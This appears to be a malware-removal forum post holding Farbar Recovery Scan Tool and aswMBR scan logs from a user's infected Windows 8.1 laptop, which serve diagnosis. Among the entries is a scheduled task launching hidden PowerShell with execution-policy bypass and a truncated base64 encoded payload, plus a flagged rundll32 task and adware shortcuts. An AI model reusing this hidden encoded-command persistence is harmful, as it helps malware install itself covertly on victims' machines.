(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0760D692-A784-43E7-85B8-2B2684E560A9} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-11] (McAfee, Inc.)
Task: {1526BB02-27BD-49DA-9D1E-D83BEB7D5B25} - System32\Tasks\FawnPediatricianMercuriallyV2 => Rundll32.exe PloppingOccupancies.dll,main 7 1 <==== ATTENTION
Task: {1C937EA3-02C6-4411-B988-23A42DA8BCDB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {240BB078-B706-4FBC-A966-315BD0CF04AA} - System32\Tasks\HPCeeScheduleForFawn => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {31080FF0-04D4-42FE-9F1D-C5931F761D09} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2016-01-03] (McAfee, Inc.)
Task: {5036E1E6-0240-44BA-9846-5DCA42CFD3BC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-02-17] (Hewlett-Packard)
Task: {5575AF6F-E83C-4C17-B6F8-7800F9BE18C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-23] (Google Inc.)
Task: {5AA23701-E548-42E8-8807-A8AC6914BC39} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-01-12] (Hewlett-Packard Company)
Task: {5AE6EF17-0F12-4444-8255-89C8BB6E4628} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-09] (Microsoft Corporation)
Task: {6546A02A-83CC-4FF5-902D-3014E7B66225} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-01-20] (Hewlett-Packard)
Task: {68378BB1-53EC-4C77-949B-C806FF502CEC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {79A6644D-454B-49A9-96AD-F1815FE7CB01} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-23] (Google Inc.)
Task: {840D75F4-6B63-425A-9218-F311DA896CDD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {855913D5-AD47-4E5E-AE26-9820E15453B9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-12-21] (Hewlett-Packard Company)
Task: {868E6E9F-5088-428A-966A-08CA9064672B} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-11] (McAfee, Inc.)
Task: {AAD4C20A-745E-4F5B-89C1-55960794CB50} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {AB055FD9-966F-40AB-8ADD-5A7B473AEC55} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2015-11-03] (McAfee, Inc.)
Task: {B1FA90AE-9C36-4B18-AC74-D64135779166} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-12-21] (Hewlett-Packard Company)
Task: {B4EECBD3-45D1-444D-BF90-2D3EC12F2F7C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-02-17] (Hewlett-Packard)
Task: {D1CAD731-070B-4B9F-A9F9-1FB6BED3BDB1} - System32\Tasks\{7D7F0447-7D0E-0B7A-7E11-7F7D0905110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9444 more characters).
Task: {DF03C2BA-FAA1-40E7-BB74-12E596E53688} - System32\Tasks\McAfee\McAfee Idle Detection Task
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForFawn.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RebateAll\RebateAll.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://rebateall.com/activation2/?dp=0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0E
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\RebateAll.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://rebateall.com/activation2/?dp=0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0E
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.com/gp/bit/amazonbookmark.html?tag=hp2-desktop-us-20&partner=HP
ShortcutWithArgument: C:\Users\Public\Desktop\Get Dropbox Offer.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://js.redirect.hp.com/jumpstation?bd=all&c=143&locale=en_us&pf=cnnb&s=db_dticon&tp=dropbox
==================== Loaded Modules (Whitelisted) ==============
2016-03-03 17:55 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-03-03 17:55 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-03-03 17:55 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-03-03 17:55 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-03-03 17:55 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2016-02-20 12:02 - 2016-02-17 20:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
2016-02-20 12:02 - 2016-02-17 20:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com
There are 7872 more sites.
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\123simsen.com -> www.123simsen.com
There are 7872 more sites.
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 05:25 - 2016-03-03 19:07 - 00451004 ____R C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 www.007guard.com
127.0.0.1 007guard.com
127.0.0.1 008i.com
127.0.0.1 www.008k.com
127.0.0.1 008k.com
127.0.0.1 www.00hq.com
127.0.0.1 00hq.com
127.0.0.1 010402.com
127.0.0.1 www.032439.com
127.0.0.1 032439.com
127.0.0.1 www.0scan.com
127.0.0.1 0scan.com
127.0.0.1 1000gratisproben.com
127.0.0.1 www.1000gratisproben.com
127.0.0.1 1001namen.com
127.0.0.1 www.1001namen.com
127.0.0.1 100888290cs.com
127.0.0.1 www.100888290cs.com
127.0.0.1 www.100sexlinks.com
127.0.0.1 100sexlinks.com
127.0.0.1 10sek.com
127.0.0.1 www.10sek.com
127.0.0.1 www.1-2005-search.com
127.0.0.1 1-2005-search.com
127.0.0.1 123fporn.info
127.0.0.1 www.123fporn.info
127.0.0.1 123haustiereundmehr.com
127.0.0.1 www.123haustiereundmehr.com
127.0.0.1 123moviedownload.com
127.0.0.1 www.123moviedownload.com
There are 15472 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{E3864FAE-6A64-49A4-8EC9-93ED035533C8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0E191CF9-EFB6-47F7-ABCD-FDC2DADA84F4}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5E267825-C5FF-452A-BB7B-D61D1BAD5214}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{5D8C4951-5247-4508-9227-738C2E481BBE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{D2F776E5-A0FF-460E-AA6F-2BF364B356A4}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe
FirewallRules: [{3C2C7B6D-7FA7-4A1A-8F9B-6303B534F974}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{B27066B6-B172-48F5-9D12-CCDD387530E5}] => (Allow) LPort=15600
FirewallRules: [{B6561EA3-49FD-4DA8-A039-364D5B0A1C84}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{DE3C52FC-975B-420C-8848-2DE54A0C9AF8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B94C8BC6-6BB9-48D4-9486-3B2866AA6B72}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9A46FF2-CECB-4F9F-9721-3E9B07F6BFF0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
==================== Restore Points =========================
04-03-2016 05:39:24 McAfee Vulnerability Scanner
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (03/04/2016 09:07:45 AM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1
Error: (03/04/2016 09:07:45 AM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1
Error: (03/03/2016 10:51:13 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.116;lang=;guid=6B6C2921933C4069AC6D10216E3EE726;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\1e9c8a81-9089-4f7e-97fa-a873753b1cb9.dmp
Error: (03/03/2016 08:04:20 PM) (Source: Microsoft-Windows-RestartManager) (EventID: 10007) (User: NT AUTHORITY)
Description: Application or service 'HPWMISVC' could not be restarted.
Error: (03/03/2016 05:51:30 PM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1
Error: (03/03/2016 05:51:30 PM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1
Error: (03/03/2016 05:32:59 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18124 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 1e8
Start Time: 01d175b518e46520
Termination Time: 15
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Report Id: 04908aea-e1a9-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 05:28:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.18123 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 63c
Start Time: 01d175b4af4ee3db
Termination Time: 0
Application Path: C:\Program Files\Internet Explorer\iexplore.exe
Report Id: 503e36bc-e1a8-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 05:26:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18124 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: ce8
Start Time: 01d175b4af7c314d
Termination Time: 52
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Report Id: 2007fa25-e1a8-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 04:24:25 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.116;lang=;guid=6B6C2921933C4069AC6D10216E3EE726;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\8ab6acec-cd82-4048-9469-19bd029fa366.dmp
System errors:
=============
Error: (03/04/2016 09:02:43 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:01:37 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:01:37 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:01:34 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:00:51 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056
Error: (03/04/2016 09:00:26 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Updating Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
Error: (03/04/2016 09:00:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Security Center Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
==================== Memory info ===========================
Processor: Intel(R) Celeron(R) CPU N2840 @ 2.16GHz
Percentage of memory in use: 65%
Total physical RAM: 1939.04 MB
Available physical RAM: 666.2 MB
Total Virtual: 3878.07 MB
Available Virtual: 1542.62 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:21.13 GB) (Free:4.65 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 29.1 GB) (Disk ID: 1E53D2DD)
Partition: GPT.
==================== End of Addition.txt ============================
aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
Run date: 2016-03-04 11:12:18
-----------------------------
11:12:18.458 OS Version: Windows x64 6.2.9200
11:12:18.474 Number of processors: 2 586 0x3708
11:12:18.474 ComputerName: FAWNS UserName: Fawn
11:12:18.505 Initialize success
11:12:18.520 VM: initialized successfully
11:12:18.520 VM: Intel CPU BiosDisabled
11:13:09.926 AVAST engine defs: 16030400
11:13:22.387 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000028
11:13:22.387 Disk 0 Vendor: VID:15 0.1 Size: 29820MB BusType: 12
11:13:22.403 Disk 0 MBR read successfully
11:13:22.403 Disk 0 MBR scan
11:13:22.419 Disk 0 unknown MBR code
11:13:22.419 Disk 0 Partition 1 00 EE GPT 2097151 MB offset 1
11:13:22.450 Disk 0 scanning C:\Windows\system32\drivers
11:13:22.825 Disk 0 statistics 3842/0/0 @ 29.78 MB/s
11:13:22.825 Scan stopped
11:13:26.515 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000028
11:13:26.515 Disk 0 Vendor: VID:15 0.1 Size: 29820MB BusType: 12
11:13:26.531 Disk 0 MBR read successfully
11:13:26.546 Disk 0 MBR scan
11:13:26.562 Disk 0 unknown MBR code
11:13:26.562 Disk 0 Partition 1 00 EE GPT 2097151 MB offset 1
11:13:26.593 Disk 0 scanning C:\Windows\system32\drivers
11:13:28.546 Service scanning
11:13:44.542 Modules scanning
11:13:44.573 Disk 0 trace - called modules:
11:13:44.588 ntoskrnl.exe CLASSPNP.SYS disk.sys sdstor.sys ACPI.sys sdbus.sys hal.dll
11:13:44.604 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xffffe000a5ae1060]
11:13:44.619 3 CLASSPNP.SYS[fffff8000305b170] -> nt!IofCallDriver -> \Device\00000028[0xffffe000a5ad2050]
11:13:44.619 5 sdstor.sys[fffff800035c1ebe] -> nt!IofCallDriver -> [0xffffe000a5a0ebe0]
11:13:44.635 7 ACPI.sys[fffff80002567c21] -> nt!IofCallDriver -> \Device\SdBus-0[0xffffe000a5acd060]
11:13:44.713 AVAST engine scan C:\Windows
11:13:45.356 AVAST engine scan C:\Windows\system32
11:14:44.522 AVAST engine scan C:\Windows\system32\drivers
11:14:46.277 AVAST engine scan C:\Users\Fawn
11:16:19.709 AVAST engine scan C:\ProgramData
11:16:30.592 Disk 0 statistics 1270889/0/0 @ 7.23 MB/s
11:16:30.608 Scan finished successfully
11:16:58.380 Disk 0 MBR has been saved successfully to "C:\Users\Fawn\Desktop\MBR.dat"
11:16:58.395 The log file has been saved successfully to "C:\Users\Fawn\Desktop\aswMBR.txt"
Thanks
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:04-03-2016
Ran by Fawn (administrator) on FAWNS (04-03-2016 10:04:58)
Running from C:\Users\Fawn\Desktop
Loaded Profiles: Fawn (Available Profiles: Fawn)
Platform: Windows 8.1 Connected (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
(Intel(R) Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
